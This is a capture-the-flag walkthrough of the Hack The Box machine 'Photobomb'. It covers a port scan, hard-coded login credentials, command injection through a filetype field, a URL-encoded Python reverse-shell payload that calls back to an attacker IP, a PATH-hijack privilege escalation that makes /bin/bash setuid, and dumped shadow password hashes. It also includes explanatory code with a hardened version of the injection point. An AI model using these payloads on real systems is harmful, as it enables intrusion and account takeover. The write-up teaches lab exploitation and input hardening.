Basic information

Port scan

22,80:

$ nmap -sC -sV -Pn 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-12 10:25 CST
Nmap scan report for 10.10.11.182
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

Port 80 redirects to photobomb.htb, so a hosts entry is needed:

10.10.11.182 photobomb.htb

photobomb.htb

The credentials can be found in the page's JavaScript:

pH0t0 : b0Mb!

After logging in, the site shows a large gallery of images:

Command injection

There is a feature for downloading an image for printing. The filetype parameter of that POST request is passed to a shell unsanitized, so a `;`-separated command can be appended to it. The URL-encoded request body below injects a Python reverse shell back to the attacker's host (10.10.14.4:4444):

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'&dimensions=3000x2000
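To make the injection mechanics concrete, here is an added example that is not code from the page or from the Photobomb application. It decodes a request body of the same shape as the one above, reproduces the bug with an assumed ImageMagick-style `convert ... -resize ...` command line (the real command the app runs is not on the page), and puts the hardened version beside it: allow-listed fields and an argv list instead of a shell string. The injected command is shortened to a harmless `;echo INJECTED` so the script runs offline; the request body is constructed for the example.

```python
"""Command injection through the filetype parameter: an added example, not
code from the page or the Photobomb app. The convert command shape is an
assumption; the request bodies are constructed for illustration."""
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed bodies with the same three fields as the real request.
INJECTED_BODY = (
    "photo=voicu-apostol-MWER49YaD-M-unsplash.jpg"
    "&filetype=jpg;echo%20INJECTED"
    "&dimensions=3000x2000"
)
BENIGN_BODY = (
    "photo=voicu-apostol-MWER49YaD-M-unsplash.jpg"
    "&filetype=jpg&dimensions=3000x2000"
)

ALLOWED_FILETYPES = {"jpg", "png"}
PHOTO_RE = re.compile(r"^[A-Za-z0-9_-]+\.jpg$")
DIMENSIONS_RE = re.compile(r"^[1-9]\d{0,4}x[1-9]\d{0,4}$")


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def build_cmd_vulnerable(fields):
    """The bug: request fields interpolated into a single shell string."""
    photo, filetype, dims = fields["photo"], fields["filetype"], fields["dimensions"]
    stem = photo.rsplit(".", 1)[0]
    return (f"convert source_images/{photo} -resize {dims} "
            f"resized_images/{stem}_{dims}.{filetype}")


def run_vulnerable(fields):
    """Hands the string to /bin/sh, as the injectable endpoint effectively does.
    convert need not be installed: the shell runs the injected command anyway."""
    cmd = build_cmd_vulnerable(fields)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def build_cmd_safe(fields):
    """Hardened form: allow-list every field, then return an argv list so no
    shell ever parses attacker-controlled values."""
    photo, filetype, dims = fields["photo"], fields["filetype"], fields["dimensions"]
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"filetype not allowed: {filetype!r}")
    if not PHOTO_RE.match(photo):
        raise ValueError(f"bad photo name: {photo!r}")
    if not DIMENSIONS_RE.match(dims):
        raise ValueError(f"bad dimensions: {dims!r}")
    stem = photo.rsplit(".", 1)[0]
    return ["convert", f"source_images/{photo}", "-resize", dims,
            f"resized_images/{stem}_{dims}.{filetype}"]


if __name__ == "__main__":
    fields = parse_body(INJECTED_BODY)
    print("shell string:", build_cmd_vulnerable(fields))
    print("stdout from vulnerable path:", run_vulnerable(fields))
    try:
        build_cmd_safe(fields)
    except ValueError as exc:
        print("hardened path rejected it:", exc)
    print("hardened argv:", build_cmd_safe(parse_body(BENIGN_BODY)))
```

The hardened builder still needs to be executed with `subprocess.run(argv)` (no `shell=True`); the allow-list on `filetype` is what stops the `;`, and the argv form is what makes the remaining fields inert even if a check were missed.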

user flag

The shell we get is already the user account, so the user flag can be read directly:

Privilege escalation enumeration

Checking sudo shows a shell script we may run as root, and inside it the cp and find commands are invoked by bare name rather than with absolute paths:

So this is an ordinary PATH (environment variable) hijack:

Privilege escalation & root flag

It is convenient to drop an SSH public key first and log in properly. One small detail: cd is a shell builtin, so it is never looked up in PATH and cannot be hijacked; the fake binary has to be named find (or cp), and it must be executable, otherwise the real find runs as usual:

cd /tmp
echo "chmod +s /bin/bash" > /tmp/find
chmod +x /tmp/find          # without execute permission the real find still runs
sudo PATH=/tmp:$PATH /opt/cleanup.sh
/bin/bash -p                # -p keeps the setuid root privileges
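The same hijack can be reproduced locally without sudo or the target box, which makes the "cd is a builtin, find is not" detail easy to verify. The script below is an added example, not the page's commands and not the real /opt/cleanup.sh (whose contents are not shown on the page); the stand-in victim script only shares the defect that matters, a bare-name `find` call after a `cd`. A fake `cd` is planted alongside the fake `find` to show that only the external command is redirected.

```sh
#!/bin/sh
# Added example (not from the page): PATH hijack reproduced locally, no sudo.
# The victim script is a stand-in for /opt/cleanup.sh, not its real contents.
set -eu

make_victim() {
    # $1 = directory to write the victim script into
    cat > "$1/cleanup.sh" <<'EOF'
#!/bin/sh
cd /tmp                   # builtin: never looked up in PATH
find . -maxdepth 0        # external: resolved through PATH, normally prints "."
EOF
    chmod +x "$1/cleanup.sh"
}

plant_fakes() {
    # $1 = attacker-writable directory that will be placed first in PATH
    printf '#!/bin/sh\necho hijacked\n'    > "$1/find"
    printf '#!/bin/sh\necho cd-hijacked\n' > "$1/cd"
    chmod +x "$1/find" "$1/cd"    # without +x the hijack silently falls through
}

# Runs the victim with the attacker directory first in PATH.
# Prints only "hijacked": the fake cd is ignored, the fake find runs.
path_hijack_demo() {
    dir=$(mktemp -d)
    make_victim "$dir"
    plant_fakes "$dir"
    PATH="$dir:$PATH" "$dir/cleanup.sh"
    rm -rf "$dir"
}

# Control run with an untouched PATH: the real find prints ".".
no_hijack_demo() {
    dir=$(mktemp -d)
    make_victim "$dir"
    "$dir/cleanup.sh"
    rm -rf "$dir"
}

path_hijack_demo
```

On the box the PATH prefix travels through sudo, which only honours a `VAR=value` given on the command line when the matching sudoers entry carries the SETENV tag (or the setenv option is set); without that, sudo rejects the assignment and the hijack never reaches the script. Checking the sudo -l output for SETENV is therefore the first thing to look for before trying this.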

shadow

root:$6$7MU2U.CeiY0WX91P$TUNn8zNu/XUPSgURRJbzYvnnawpZdGhsWiLSpVrm1cIx9Rev7V/yQ5x58gTy98zcXrv6RqlWRtXcbhEhTl3240:19251:0:99999:7:::
wizard:$6$qmjmqNE6eDSugXXx$KSXyEnRqlVcnAOT9iqxGRsrwnakYHAlF8mNMpEE75i3ZHA0T23OVnedmK3rbaw2gMFbLekluAtgByD/mySzsy1:19077:0:99999:7:::

References